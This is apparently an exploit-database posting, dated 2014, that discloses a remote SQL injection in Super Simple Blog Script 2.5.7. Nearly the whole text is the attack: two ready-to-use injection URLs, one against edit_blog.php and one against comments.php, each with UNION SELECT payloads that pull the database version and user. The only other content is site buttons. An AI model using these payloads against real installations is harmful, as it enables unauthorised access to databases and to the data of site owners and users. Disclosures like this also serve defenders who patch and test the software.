facebook facebook twitter rss

Super Simple Blog Script 2.5.7 SQL

Author: JIKO , Published: 26-04-2014
----------[exploit Debut]
[Remote SQL Injection Vulnerability]
----------[Author Info]

Name : JIKO

----------[Script Info]

Site:http : http://www.supersimple.org/
Version : V2_5_7
Download : https://codeload.github.com/supersimple/Super-Simple-Blog-Script/zip/master

----------[exploit Info]

1]~[Sql]
http://localhost/Path/cms/edit_blog.php?colName=uid&colVal=1&table=entries union select concat(version(),0x3A,user()),1,2,3,4,5,6--

http://localhost/Path/comments.php?entry=-122222 union select 0,concat(0x223E,version(),0x3A,user())--
----------[exploit Fin]

Like us on Facebook :